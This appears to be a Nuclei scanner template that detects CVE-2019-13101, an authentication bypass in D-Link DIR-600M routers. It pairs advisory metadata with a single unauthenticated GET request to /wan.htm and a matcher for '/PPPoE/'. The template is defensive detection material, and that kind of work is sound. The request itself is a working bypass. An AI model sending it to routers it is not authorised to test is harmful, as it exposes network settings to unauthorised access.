id: CVE-2019-13101

info:
  name: D-Link DIR-600M - Authentication Bypass
  author: Suman_Kar
  severity: critical
  description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the router's settings, potentially leading to further compromise of the network.
  remediation: |
    Update the router's firmware to the latest version provided by D-Link.
  reference:
    - https://github.com/d0x0/D-Link-DIR-600M
    - https://www.exploit-db.com/exploits/47250
    - https://nvd.nist.gov/vuln/detail/CVE-2019-13101
    - https://us.dlink.com/en/security-advisory
    - http://packetstormsecurity.com/files/153994/D-Link-DIR-600M-Wireless-N-150-Home-Router-Access-Bypass.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-13101
    cwe-id: CWE-306
    epss-score: 0.0359
    epss-percentile: 0.9142
    cpe: cpe:2.3:o:dlink:dir-600m_firmware:3.02:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: dir-600m_firmware
  tags: cve2019,cve,packetstorm,edb,dlink,router,iot

http:
  - raw:
      - |
        GET /wan.htm HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "/PPPoE/"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100af3cf81676c3a2a1bc2df5fd9a8f165442b9cab1f612b9824a7f1340c0ee49dd022100e14684c8fb70ae052c5b46650e2f320a016f6b34fc784daa1ed3a020a08c3d40:922c64590222798bb761d5b6d8e72950